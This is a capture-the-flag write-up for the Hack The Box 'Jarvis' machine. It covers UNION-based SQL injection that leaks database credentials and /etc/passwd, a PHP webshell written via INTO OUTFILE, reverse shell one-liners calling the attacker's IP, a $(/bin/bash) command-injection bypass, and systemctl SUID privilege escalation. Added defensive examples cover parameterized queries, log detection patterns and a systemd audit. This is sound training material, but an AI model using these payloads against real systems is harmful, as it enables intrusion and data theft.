Linux Boxes

jarvis

  1. nmapAutomator
  2. gobuster
  3. initial foothold
    1. manual SQL injection (Blind SQL injection)
      1. Error based Blind SQL Injection
      2. revshell.php
      3. Exploit the SQL injection to add php code into a file on the system
      4. reverse shell
    2. sqlmap
      1. sqlmap --os-shell
  4. privesc to pepper
    1. simpler.py
      1. ping method
    2. simpler.py privesc
  5. privesc to root
    1. linEnum.sh
      1. SUID files
    2. lse.sh
    3. systemctl GTFO
      1. Systemctl misconfigured permissions sudo/SUID
      2. root.service
  6. user/root
  7. lessons learned

jarvis


nmapAutomator


22/tcp ssh
80/tcp http
64999/tcp known server


gobuster


initial foothold

this is the front page of our victim webserver

navigating through Home, Rooms and Dining & Bar: the Rooms link redirects you to the room listing, and navigating to a room we see there are 6 types of rooms; clicking the "book now" button sets the cod parameter of room.php equal to the room number

a simple way to find out how many rooms (rows) this database table holds is to increment the cod value until nothing gets returned on the webpage

now we know there are only 6 entries in the database

manual SQL injection (Blind SQL injection)

since we have reason to believe the webserver is talking to a MySQL backend (hotel reservation website with hotel rooms, prices etc.), we can verify our suspicions through a variety of different blind SQL injections and see how the webserver responds

first, we can check whether or not the SQL query has any input sanitation/validation by adding a single quote ' to see if the SQL query breaks

we know a normal cod value returns the Superior Family room, but if we add a single quote ' to it, it breaks the internal SQL query, meaning there is NO input validation or sanitation (single quotes are not escaped)


for SQL enumeration to be the most effective, it is crucial to find out how many columns the query is selecting, because otherwise our UNION injection will not output correctly, if at all. Luckily, a simple way to find out how many columns this query has is to increment a UNION SELECT statement and see if the webpage spits out anything interesting from the backend database

to find out the exact number of columns, we'll keep adding column numbers to our MySQL query until the database comes back with a non-error, so
union select 1
union select 1,2
union select 1,2,3
union select 1,2,3,4
union select 1,2,3,4,5
union select 1,2,3,4,5,6

all show empty server responses (the column counts don't match, so the query errors and the page prints nothing)

BUT
/room.php?cod=9999 union select 1,2,3,4,5,6,7
bingo! because the webserver is now spitting out our placeholder numbers instead of a real room, we know the database has executed our UNION statement and that the query selects 7 columns
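As an added example (not code from the writeup), here is the room lookup modelled in Python on an in-memory SQLite table, with the vulnerable string-built query beside a parameterized one; the table name, column names and rows are assumptions, only the 7-column/6-row shape comes from the probing above.

```python
import sqlite3

# Constructed stand-in for the hotel's room table: 7 columns and 6 rooms, as
# the probing above revealed. Column names are assumed, not taken from the box.
_ROWS = [
    (1, "Superior Family", "Family room", 150, "1.jpg", 0, 4),
    (2, "Suite", "Spacious suite", 200, "2.jpg", 0, 2),
    (3, "Double Room", "Two beds", 120, "3.jpg", 1, 2),
    (4, "Single Room", "One bed", 90, "4.jpg", 0, 1),
    (5, "Penthouse", "Top floor", 400, "5.jpg", 0, 4),
    (6, "Economy", "Basic room", 60, "6.jpg", 1, 2),
]

def _fresh_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE room(cod INTEGER, name TEXT, descrip TEXT, "
               "price INTEGER, image TEXT, star INTEGER, capacity INTEGER)")
    db.executemany("INSERT INTO room VALUES (?,?,?,?,?,?,?)", _ROWS)
    return db

def vulnerable_lookup(cod):
    """room.php style: the cod value is pasted straight into the SQL text.

    A broken query returns None, the same 'empty page' the box shows."""
    db = _fresh_db()
    try:
        return db.execute("SELECT * FROM room WHERE cod=" + cod).fetchone()
    except sqlite3.Error:
        return None

def safe_lookup(cod):
    """Same lookup with cod bound as a parameter; the value can never become SQL."""
    db = _fresh_db()
    return db.execute("SELECT * FROM room WHERE cod=?", (cod,)).fetchone()
```

With the bound parameter, the six- and seven-column UNION probes and the stray quote are all just text that matches no row, which is why the column-counting trick only works against the concatenated form.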

now comes the fun part!

Error based Blind SQL Injection

Error Based Database Enumeration

now that we know the correct number of columns, we can substitute a valid MySQL subquery into one of the columns! take for example the simple query
SELECT user FROM mysql.user
subbing it in makes our original union select statement look like this:
http://10.10.10.143/room.php?cod=9999 union select 1,(SELECT user FROM mysql.user),3,4,5,6,7
and we leaked DBadmin's username!
user=DBadmin

Great! we may even be able to leak the password data as well from mysql.user with
SELECT password FROM mysql.user
subbing it in looks like the following:
http://10.10.10.143/room.php?cod=9999 union select 1,(SELECT password FROM mysql.user),3,4,5,6,7
and we leaked DBadmin's password hash!
password=2D2B7A5E4E637B8FBA1D17F40318F277D29964D0



we can also use the group_concat() MySQL function to combine different database values into one string, enumerating/outputting their contents all at once
http://10.10.10.143/room.php?cod=9999 union select 1,(SELECT group_concat(host,user,password) FROM mysql.user),3,4,5,6,7

another MySQL function we can play around with is LOAD_FILE('<file location>'), which is practically like the local file inclusion vulnerability we've seen before; we can leak sensitive files from our victim this way! Let's try outputting /etc/passwd

http://10.10.10.143/room.php?cod=9999 union select 1,LOAD_FILE('/etc/passwd'),3,4,5,6,7



let's throw the hash 2D2B7A5E4E637B8FBA1D17F40318F277D29964D0 into crackstation
and just like that, we've leaked DBadmin's password: imissyou

revshell.php

PHP code written into the web root through MySQL gets executed by the web server when our browser navigates to its URL. Let's grab pentestmonkey's php reverse shell on our machine

and tweak its configuration to call back to our attack machine's IP on the port we desire

Exploit the SQL injection to add php code into a file on the system

Next, exploit the SQL injection to add PHP code to a file on the system. This involves two steps: (1) inject PHP code that downloads the reverse shell script from the attack machine and saves it in a file on the target system, and (2) save the output of the query into a PHP file under the web root using the MySQL INTO OUTFILE statement.


9999 union select 1,(select '<?php exec(\"wget -O /var/www/html/shell.php http://10.10.14.62:5555/revshell.php\");?>'),3,4,5,6,7 INTO OUTFILE '/var/www/html/test4.php'
injecting PHP into the URL string did not work as nicely for me as it did for Rana, so I'm going to upload the PHP directly onto the server


SELECT "<?php system($_GET['c']); ?>" INTO OUTFILE '/var/www/html/sh3ll.php'

now if we navigate to 10.10.10.143/sh3ll.php?c=whoami we get the output of the command
there's a way to upload this php system request through a direct sql injection as well but I haven't gotten it to work yet.
http://10.10.10.143/room.php?cod=7 UNION SELECT 1,(SELECT '<?php system($_GET["cmd"]); ?>'),3,4,5,6,7 into outfile '/var/www/html/test6.php'

NOTE: we can also inject this statement by nesting a wget call within the SQL injection using the syntax discussed in the previous node; it would look like this:

http://10.10.10.143/room.php?cod=7 UNION SELECT 1,(SELECT '<?php exec(\"wget http://10.10.14.24/revshell.php -O /var/www/html/shell.php\"); ?>'),3,4,5,6,7 into outfile '/var/www/html/test5.php'

reverse shell

taking the netcat OpenBSD reverse shell from PayloadsAllTheThings
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.62 1337 >/tmp/f

and URL-encoding it (ctrl+z a)

rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh%20-i%202%3E%261%7Cnc%2010.10.14.62%201337%20%3E%2Ftmp%2Ff

when we send it through the shell script we've uploaded
10.10.10.143/sh3ll.php?c=rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh%20-i%202%3E%261%7Cnc%2010.10.14.62%201337%20%3E%2Ftmp%2Ff

we get a shell!

this (URL encoded) works too
10.10.10.143/sh3ll.php?c=php -r '$sock=fsockopen("10.10.14.62",4242);$proc=proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);'
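From the defender's side, every step of the chain above (quote probe, UNION column counting, mysql.user reads, LOAD_FILE, INTO OUTFILE, then the webshell's ?c= parameter) lands in the web server's access log. As an added example, not from the writeup, here is a small classifier run over constructed Apache-style log lines modelled on those requests; the client address, timestamps and sizes are made up.

```python
import re
from urllib.parse import unquote_plus

# Constructed Apache-style access log lines modelled on the requests in this
# writeup; client address, timestamps and sizes are made up for the example.
SAMPLE_LOG = """\
10.10.14.62 - - [01/Jan/2020:10:00:01 +0000] "GET /room.php?cod=3 HTTP/1.1" 200 5120
10.10.14.62 - - [01/Jan/2020:10:00:02 +0000] "GET /room.php?cod=3' HTTP/1.1" 200 1800
10.10.14.62 - - [01/Jan/2020:10:00:03 +0000] "GET /room.php?cod=9999%20union%20select%201,2,3,4,5,6,7 HTTP/1.1" 200 5200
10.10.14.62 - - [01/Jan/2020:10:00:04 +0000] "GET /room.php?cod=9999%20union%20select%201,(SELECT%20password%20FROM%20mysql.user),3,4,5,6,7 HTTP/1.1" 200 5210
10.10.14.62 - - [01/Jan/2020:10:00:05 +0000] "GET /room.php?cod=9999%20union%20select%201,LOAD_FILE('/etc/passwd'),3,4,5,6,7 HTTP/1.1" 200 6000
10.10.14.62 - - [01/Jan/2020:10:00:06 +0000] "GET /room.php?cod=9999%20union%20select%201,'x',3,4,5,6,7%20into%20outfile%20'/var/www/html/t.php' HTTP/1.1" 200 5200
10.10.14.62 - - [01/Jan/2020:10:00:07 +0000] "GET /sh3ll.php?c=whoami HTTP/1.1" 200 20
10.10.14.62 - - [01/Jan/2020:10:00:08 +0000] "GET /rooms.php HTTP/1.1" 200 4000
"""

# Common log format: client, ident, user, [time], "method path proto", status
REQ_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')

# One rule per stage of the chain used against room.php on this box.
RULES = [
    ("sqli-probe", re.compile(r"""['"](?:\s*$|\s*(?:or|and)\b)""", re.I)),
    ("union-column-enum", re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)),
    ("mysql-user-read", re.compile(r"\bmysql\.user\b", re.I)),
    ("file-read", re.compile(r"\bload_file\s*\(", re.I)),
    ("file-write", re.compile(r"\binto\s+(?:out|dump)file\b", re.I)),
    ("webshell-cmd", re.compile(r"\.php\?(?:c|cmd)=", re.I)),
]

def classify_request(line):
    """Return (client, decoded path, [rule names hit]) or None if unparsable."""
    m = REQ_RE.match(line)
    if not m:
        return None
    client, _ts, _method, path, _status = m.groups()
    decoded = unquote_plus(path)  # match on the decoded query string
    return client, decoded, [name for name, rx in RULES if rx.search(decoded)]

def scan_log(text):
    """Map each client to the sorted rule names it triggered across the log."""
    summary = {}
    for line in text.splitlines():
        parsed = classify_request(line)
        if parsed and parsed[2]:
            summary.setdefault(parsed[0], set()).update(parsed[2])
    return {client: sorted(hits) for client, hits in summary.items()}
```

A single client tripping the union, file-read, file-write and webshell rules in sequence is the signature of this whole foothold; matching on the decoded path matters because the requests above arrive with %20 and friends.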

sqlmap

first thing sqlmap needs is the GET request to room.php, so fire up Burp Suite, intercept it and save it to a text file request.txt

sqlmap -v 4 --user-agent="Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0" -r request.txt

user is DBadmin
password is imissyou

sqlmap --os-shell

sqlmap -v 4 --user-agent="Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0" --os-shell -r request.txt

from the os-shell we call a reverse shell back to our attack machine with
nc -e /bin/sh 10.10.14.62 1234

privesc to pepper

we see as www-data we can run simpler.py as pepper

looking at the file we see we have read permissions

simpler.py

we see simpler.py is our avenue to privesc; it is a custom script that we'll have to look into for vulnerabilities

ping method

we can run sudo -u pepper /var/www/Admin-Utilities/simpler.py -p to reach the ping method as pepper
because the program plugs the user-supplied target straight into an os.system command, with no input validation beyond a blocklist of forbidden characters (& ; - ' || and |), we should be able to escape this method and spawn a shell by avoiding those characters

simpler.py privesc

$(/bin/bash) successfully avoids the forbidden characters in the program and spawns us a shell
and we're pepper!

I had some problems with this pepper shell so I used

nc -e /bin/bash 10.10.14.62 1235 to call another reverse shell back to our attacking machine, which had much better functionality
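The ping method fails because it filters characters instead of validating the value. As an added example (not the box's simpler.py, whose source is not reproduced here), the blocklist below is reconstructed from the writeup's description and placed beside an allowlist version that only accepts a parseable IP address and never hands the value to a shell; `ping -c 1` as the underlying command is an assumption.

```python
import ipaddress

# Blocklist reconstructed from this writeup's description of simpler.py's ping
# method; assumed to match the script, whose source is not reproduced here.
FORBIDDEN = ["&", ";", "-", "'", "||", "|"]

def blocklist_rejects(target):
    """The script's check: refuse the input only if it contains a listed token."""
    return any(tok in target for tok in FORBIDDEN)

def blocklist_command(target):
    """The string the script would hand to os.system (built here, never run)."""
    if blocklist_rejects(target):
        return None
    return "ping -c 1 " + target  # assumed shape of the original command

def allowlist_accepts(target):
    """Hardened check: the value must parse as an IPv4/IPv6 address, nothing else."""
    try:
        ipaddress.ip_address(target)
    except ValueError:
        return False
    return True

def hardened_argv(target):
    """argv for subprocess.run(argv) with shell=False, so no shell ever parses it."""
    if not allowlist_accepts(target):
        return None
    return ["ping", "-c", "1", target]
```

The blocklist stops the obvious `;` and `|` separators but passes `$(...)` untouched into a shell, while the allowlist rejects anything that is not an address and the argv form removes the shell from the path entirely.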

privesc to root

linEnum.sh

let's start our privesc enumeration with LinEnum.sh (-t for thorough)

SUID files

systemctl is known to be an uncommon SUID binary and is exploitable for privesc purposes



lse.sh

gonna run lse.sh here for good measure since I love it
(upload it onto our victim the same way we uploaded LinEnum)

it instantly shows us systemctl is an uncommon setuid binary, and that is our primary attack vector

we could potentially take advantage of some local cron files by overwriting/hijacking the files they execute, but none of them run on a frequent basis, so best to stick with systemctl here

systemctl GTFO

googling GTFOBins systemctl shows there are ways to escalate privileges with sudo privileges on systemctl

Systemctl misconfigured permissions sudo/SUID

https://medium.com/@klockw3rk/privilege-escalation-leveraging-misconfigured-systemctl-permissions-bc62b0b28d49

/bin/systemctl enable /home/~/root.service
where ~ stands for the home directory of our compromised user pepper

root.service

The plan is to write our own root.service unit that systemctl will run as root when we start its service

we'll use the bash reverse shell from pentestmonkey here to call a reverse shell back to our attack machine

now we enable the service with systemctl

and start it with our attack machine listening on the revshell's designated port and...

we're root!
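Enabling a unit from a home directory leaves a symlink under /etc/systemd/system/*.wants/ that points outside systemd's own unit directories, which is a cheap thing to audit after the fact. As an added example (not from the writeup), this check walks a config directory and reports such links, including dangling ones; the demo tree it builds, with a packaged ssh.service beside a unit enabled from /home/pepper, is constructed for the example.

```python
import os
import tempfile

# Unit directories systemd itself owns. An enabled unit whose symlink points
# anywhere else (a home directory, /tmp, /dev/shm) was not installed by a package.
TRUSTED_PREFIXES = ("/etc/systemd/", "/lib/systemd/", "/usr/lib/systemd/", "/run/systemd/")

def foreign_enabled_units(config_dir="/etc/systemd/system"):
    """Return [(symlink, raw target)] for units enabled from outside systemd's dirs.

    The raw link text is inspected (not its resolution), so a dangling link
    left behind after the unit file was deleted is still reported."""
    findings = []
    for root, _dirs, files in os.walk(config_dir):
        if not root.endswith((".wants", ".requires")):
            continue
        for name in files:
            link = os.path.join(root, name)
            if os.path.islink(link):
                target = os.readlink(link)
                if not target.startswith(TRUSTED_PREFIXES):
                    findings.append((link, target))
    return findings

def build_demo_tree():
    """Constructed config dir: one packaged unit and one enabled from pepper's home."""
    base = tempfile.mkdtemp()
    wants = os.path.join(base, "multi-user.target.wants")
    os.makedirs(wants)
    os.symlink("/lib/systemd/system/ssh.service", os.path.join(wants, "ssh.service"))
    os.symlink("/home/pepper/root.service", os.path.join(wants, "root.service"))
    return base

if __name__ == "__main__":
    for link, target in foreign_enabled_units(build_demo_tree()):
        print(f"suspicious unit: {link} -> {target}")
```

Run against a real host, call foreign_enabled_units() with no argument; a hit like the pepper one is worth pairing with a check for SUID or sudo access to systemctl, since that is what made the enable possible here.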

user/root

user: 2afa36c4f05b37b34259c93551f5c44f

root: d41d8cd98f00b204e9800998ecf84271

lessons learned

Check out Rana Khalil's OSCP writeups and prep at https://rana-khalil.gitbook.io/hack-the-box-oscp-preparation/
